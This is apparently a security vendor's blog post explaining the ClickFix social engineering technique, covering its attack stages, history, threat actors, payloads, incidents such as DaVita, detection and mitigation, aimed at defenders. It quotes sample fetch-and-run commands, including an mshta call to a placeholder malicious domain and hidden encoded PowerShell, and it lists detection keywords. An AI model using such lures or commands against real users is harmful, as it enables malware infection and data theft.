Back to Blog
Threat IntelligenceClickFixSocial EngineeringRansomwareAPTThreat IntelligenceCybersecurity Indonesia

ClickFix: The Social Engineering Technique That Tricks Victims Into Infecting Themselves

ClickFix grew 517% in six months and is now the second-largest attack vector in the world. Uniquely, there's no exploit — victims execute the malware themselves. This article covers how it works, real campaigns (DaVita, APT28, Kimsuky), and how your organization can defend against it.

Tim Riset CloudSphere

Threat Intelligence & Security Research

July 1, 2026
15 min read

What Is ClickFix?

ClickFix is a social engineering technique that manipulates victims into voluntarily executing malicious commands on their own devices. No exploit, no suspicious attachment — just a web page with seemingly official instructions and a victim who presses Enter.

This is not a technical vulnerability. It is an attack on human psychology — far more difficult for conventional security technology to block, because the user themselves becomes the 'last-mile executor' of the attack.

World's #2 Attack Vector (H1 2025)

ClickFix accounts for ~8% of all attacks blocked globally, making it the second-largest attack vector worldwide after conventional phishing. Growth in H1 2025 vs H2 2024: +517% (ESET Threat Report H1 2025).

How ClickFix Works — Step-by-Step

ClickFix succeeds because its presentation is convincing and its instructions feel routine. Here is the complete anatomy of this attack from initial contact to infection.

01

Initial Lure — Directing the Victim to a Malicious Page

Victims are directed to a malicious web page through various delivery channels:

  • Phishing emails containing links that appear legitimate
  • Malvertising — malicious ads on streaming or illegal download sites
  • SEO poisoning — malicious sites ranking high in search results
  • Compromised WordPress sites
  • Fake GitHub issue notifications
  • Forums or social media promoting cracked software
02

Fake Verification Page — The Convincing Deception

The page displays a lure that appears highly convincing, including:

  • Fake reCAPTCHA/CAPTCHA: 'Click I\'m not a robot to continue'
  • Fake Cloudflare Turnstile: 'Bot protection verification required'
  • Browser error: 'Your browser cannot display this content'
  • Fake Google Meet/Teams/Zoom: 'Your microphone has an issue, run the repair tool'
  • Fake Windows BSOD: a full blue screen display with 'repair' instructions
03

Clipboard Hijacking — Silent Malicious Injection

When the victim clicks a button ('I\'m not a robot', 'Fix It', 'Verify'), JavaScript embedded in the page automatically copies a malicious command to the victim's clipboard — without their knowledge. The malicious code is placed at the beginning of the string while non-executable 'comments' are appended at the end to obscure the clipboard contents.

04

User Execution via Win+R — The Victim Runs the Command Themselves

A pop-up appears with seemingly official instructions: 'Press Windows+R, then press Ctrl+V, then press Enter to complete verification.' The victim follows these instructions without realizing they have just executed a malicious command in their Windows terminal. On macOS, victims are directed to open Terminal and paste a bash/curl command.

05

Payload Download — Fetching the Malware

The executed command typically takes the form of an encoded PowerShell command or MSHTA that downloads a payload from the attacker's server. Real-world examples from Group-IB analysis:

  • powershell.exe -eC [BASE64_ENCODED_COMMAND]
  • powershell.exe -WindowStyle Hidden -EncodedCommand [...]
  • mshta.exe 'https://malicious-domain.com/payload'
06

Multi-Stage Delivery — Fileless, Layered Infection

The loader fetches a second stage from a rotating domain. The second stage establishes persistence (registry, scheduled task), attempts to disable protections, and injects the final payload into legitimate Windows processes (such as explorer.exe). The final payload — typically an infostealer or RAT — runs entirely in memory without writing files to disk, evading many traditional antivirus solutions.

History & Evolution of ClickFix

ClickFix did not emerge overnight. It evolved gradually from a simple trick into the preferred tool of nation-state espionage groups.

PeriodKey Event
October 2023First detection — a simple variant impersonating Cloudflare anti-bot. Not yet named 'ClickFix'
March 2024Proofpoint documents it extensively. TA571 and ClearFake cluster become early adopters. The name 'ClickFix' enters use
May 2024ClearFake integrates ClickFix + EtherHiding (payload hidden in BNB Chain smart contracts). Payload: Emmenhtal Loader and Lumma Stealer
August 2024Mass adoption. SmartApeSG distributes Remcos RAT, NetSupport RAT, StealC, and Sectop RAT via ClickFix
October 2024APT28 (Russia) begins using ClickFix — the first time this criminal technique is adopted by a nation-state actor
November 2024MuddyWater (Iran) attacks 39+ Middle Eastern organizations with ClickFix
December 2024UNK_RemoteRogue (Russia) targets defense weapons manufacturers
Jan–Feb 2025Kimsuky (North Korea) begins using ClickFix to target DPRK policy think tanks
H1 2025ESET reports +517% surge. ClickFix becomes the world's second-largest attack vector
June 2025Researcher mr.d0x introduces FileFix — a ClickFix evolution using the Windows File Explorer address bar. 14 days later it appears in live attacks
Q1 2026Seven active variants identified: ClickFix original, TerminalFix, DownloadFix, FileFix, ClickFake Interview, CrashFix, and the macOS Matryoshka variant

Who Is Using ClickFix?

What makes ClickFix especially alarming is not just its prevalence, but who is using it. Within a 90-day window between October 2024 and January 2025, five nation-state groups from four different countries adopted this technique — an unprecedented rate of criminal-to-state-actor technology transfer.

Criminal Actors

  • TA571 — Initial Access Broker, first ClickFix adopter
  • ClearFake — Fake browser update + EtherHiding
  • SmartApeSG (ZPHP) — Multi-payload delivery chain
  • Storm-1865 — Global Booking.com campaign
  • Storm-1607 — Tens of thousands of emails to US & Canada
  • Interlock Group — Ransomware targeting healthcare sector

Nation-State / APT

  • APT28 (Russia) — Espionage via fake Google Spreadsheet
  • UNK_RemoteRogue (Russia) — Targeting defense weapons manufacturers
  • MuddyWater (Iran) — 39+ organizations in the Middle East
  • Kimsuky (North Korea) — DPRK policy think tanks
  • APT36 / Transparent Tribe (Pakistan) — Confirmed May 2025

Malware Delivered via ClickFix

ClickFix is payload-agnostic — it is simply a delivery mechanism. Once the victim executes the command, virtually any type of malware can be deployed. This is what makes it so dangerous: a single social engineering technique can result in data theft, ransomware, or espionage operations.

Lumma Stealer

Infostealer

The most common payload — responsible for 51% of ClickFix infections. Steals browser credentials, crypto wallets, session cookies, and 2FA codes.

NetSupport RAT

RAT

A Remote Access Trojan that leverages the legitimate NetSupport Manager tool to conceal its activity from security detection.

Interlock Ransomware

Ransomware

The Interlock group uses ClickFix as initial access before deploying ransomware in the healthcare sector — DaVita and Kettering Health are confirmed victims.

QuasarRAT

Espionage

An open-source RAT used by Kimsuky (North Korea) for espionage operations against DPRK policy think tanks in the US and Japan.

DarkGate & Latrodectus

Loader

Multi-function modular loaders that can download additional payloads, establish persistence, and operate as long-term backdoors.

AMOS (Atomic macOS Stealer)

macOS

A macOS-specific variant that steals browser credentials, crypto wallets, and other sensitive data — ClickFix is not exclusively a Windows threat.

Documented Real-World Incidents & Campaigns

ClickFix is not merely a theoretical technique. The following are well-documented campaigns and incidents that demonstrate the real-world impact of these attacks across industries and geographies.

DaVita Ransomware — March 2025

Healthcare

The second-largest kidney dialysis provider in the US. Initial intrusion via ClickFix on March 24, 2025, detected April 12. Interlock ransomware claimed 1.5 TB of stolen data — 2.7 million patient records exposed.

Kettering Health — May 2025

Healthcare

14 hospitals and 120+ clinics across the US Midwest. An Interlock ransomware attack via ClickFix caused thousands of medical procedures to be cancelled. Patient data, medical records, bank statements, and passport scans were stolen.

Storm-1865 Booking.com — Dec 2024

Hospitality

Fake emails from 'Booking.com' to hotel staff regarding 'negative guest reviews'. Targets: South Asia, Southeast Asia, North America, Oceania, Europe. Payloads: XWorm, Lumma Stealer, VenomRAT, AsyncRAT, Danabot.

APT28 Espionage — October 2024

Nation-State

Russia (APT28) impersonated Google Spreadsheet with a fake reCAPTCHA. When victims 'verified', they unknowingly opened an SSH tunnel to a Metasploit server — used for espionage operations.

MuddyWater / Iran — November 2024

Nation-State

Deliberately launched to coincide with Microsoft Patch Tuesday to make 'security alert' emails appear credible. Attacked 39+ financial and government organizations in the Middle East using Level RMM tools for espionage.

Kimsuky / North Korea — Jan 2025

Espionage

Impersonated Japanese diplomatic correspondence to deceive DPRK policy think tank researchers in the US, Japan, and South Korea. Victims saw a decoy PDF while QuasarRAT was silently installed in the background.

Statistics & Prevalence 2025

The following quantitative data illustrates the massive scale of ClickFix adoption in a short period — from a niche technique to a global threat faced by nearly every organization.

+517%

Attack growth in H1 2025 vs H2 2024

ESET Threat Report

#2

Largest attack vector globally after conventional phishing

ESET H1 2025

~8%

Of all attacks blocked globally (H1 2025)

ESET

47%

Of Microsoft Defender Experts initial access notifications involved ClickFix

Microsoft

5 APT

Nation-state groups from 4 different countries within 90 days

Proofpoint

51%

Of ClickFix infections delivered Lumma Stealer as the primary payload

Industry Analysis

Why Do Users Fall Victim?

ClickFix succeeds not because of technology failure, but because it exploits how the human brain works. Understanding these psychological factors is the first step in building effective security awareness.

Verification Fatigue

Years of CAPTCHAs and security prompts have conditioned users to complete them automatically without scrutiny. They are perceived as 'routine obstacles', not danger signals.

Authority Mimicry

ClickFix pages impersonate trusted services with pixel-perfect accuracy: Google reCAPTCHA, Cloudflare, Booking.com, Microsoft Office. Trust in these brands transfers to the fraudulent page.

Problem-Solution Framing

ClickFix always presents a 'problem' (browser error, video won't load) along with a 'solution' that appears easy and logical. The human brain instinctively seeks to resolve problems.

Urgency Creation

Countdown timers, fake counters ('127 users have already verified'), and warnings that 'your account will be suspended' create psychological pressure that reduces critical thinking capacity.

Exploiting Security Awareness

Users who are already 'phishing-aware' are vigilant about attachments. ClickFix uses no attachments — it is a normal web page with technical instructions. Conventional cognitive defenses do not apply.

Illusion of Control

Victims feel they are 'in control' because they are the ones choosing to press the button. In reality, they are being manipulated. This is psychologically far more effective than a drive-by download.

How to Detect ClickFix Attacks

ClickFix is designed to evade traditional detection because no malicious file is downloaded initially — only a user executing a command. However, there are several artifacts and signals that can be detected.

Detection MethodWhat to Look ForTool/Platform
Registry AuditRunMRU key containing PowerShell, mshta, certutil, Base64 strings, or -WindowStyle HiddenWindows Registry / SIEM
Windows Event ID 4688powershell.exe or mshta.exe spawned by explorer.exe (not an IDE or terminal)Windows Event Log / SIEM
PowerShell Script Block (Event 4104)EncodedCommand, DownloadString, Invoke-Expression, or download URLs within scriptsPowerShell Logging / SIEM
EDR Behavioral DetectionProcess chain: explorer.exe → powershell.exe → mshta.exe / certutil.exe / bitsadmin.exeEDR / XDR Platform
Network DetectionOutbound connections to new domains (<30 days old), PowerShell with unusual user-agent, DNS queries to unknown domainsFirewall / IDS / DNS Filter
Threat Intel IntegrationIoCs from Recorded Future Risk Lists, VirusTotal, ANY.RUN for active ClickFix-related domains and hashesSIEM / Threat Intel Feed

ClickFix Prevention & Mitigation

No single control is sufficient to stop ClickFix. A combination of technical hardening, personnel training, and layered detection capabilities is required.

  • Security Awareness Training

    Train users to NEVER execute commands from web page instructions. Show real examples of ClickFix pages. Communicate clearly: 'No legitimate CAPTCHA will ever ask you to open the Run dialog or a Terminal.'

  • Disable Windows Run Dialog via GPO

    User Configuration > Administrative Templates > Start Menu and Taskbar > Remove Run menu from Start Menu. This eliminates the primary execution vector for ClickFix.

  • PowerShell Hardening

    Apply Constrained Language Mode, enable Script Block Logging and Transcription Logging, and set Execution Policy to AllSigned or Restricted for non-administrator users.

  • Block mshta.exe for Standard Users

    MSHTA is a Living Off the Land Binary (LOLBIN) favored by ClickFix. Deploy AppLocker or WDAC to prevent its execution by non-administrator users.

  • Deploy EDR with Behavioral Protection

    Ensure your EDR can detect suspicious process chains and is updated with the latest ClickFix signatures. Behavioral detection is far more effective than signature-based approaches for this threat.

  • DNS Filtering & Web Proxy

    Block known malicious domains, newly registered domains (<30 days), and uncategorized sites. A Malicious Domain Blocking and Reporting (MDBR) service provides an additional layer of protection.

  • Email Security with URL Sandboxing

    Filter emails containing links to new domains, sandbox URLs before users can click them, and enforce SPF/DKIM/DMARC to prevent domain spoofing.

  • Application Allowlisting

    Whitelist approved applications and block unknown executables from %APPDATA%, %TEMP%, and other directories commonly used by ClickFix loaders.

Southeast Asia & Indonesia Threat Landscape

While no fully documented ClickFix campaign has exclusively targeted Indonesia, several major campaigns have explicitly named Southeast Asia as a target region — and Indonesia's risk factors are highly significant.

The Storm-1865 campaign impersonating Booking.com (December 2024 – March 2025) explicitly targeted 'South and Southeast Asia' alongside North America, Oceania, and Europe. Given the scale of Indonesia's hospitality and tourism industry, the potential impact is very real.

Indonesia's Risk Factors to Watch

210+ million internet users, a massive and increasingly digital SME sector, a large hospitality industry that was an explicit Storm-1865 target, security awareness that still needs improvement, and widespread use of global services (Google, Microsoft) that are ideal ClickFix impersonation targets. During Ramadan/Eid, phishing — including ClickFix-based techniques — increases by 30% according to LKDI data.

Cyber attacks in Southeast Asia doubled in 2024 vs 2023

Positive Technologies

57,000+

Ransomware incidents in Asia Pacific in H1 2024

Industry Report

Top 6

Indonesia ranks among the most ransomware-impacted countries in Southeast Asia

Regional Analysis

ClickFix requires no exploit — only psychological manipulation. CloudSphere helps your organization test its resilience against social engineering attacks through Security Assessment & VAPT.

Related Topics

ClickFixSocial EngineeringRansomwareAPTThreat IntelligenceCybersecurity Indonesia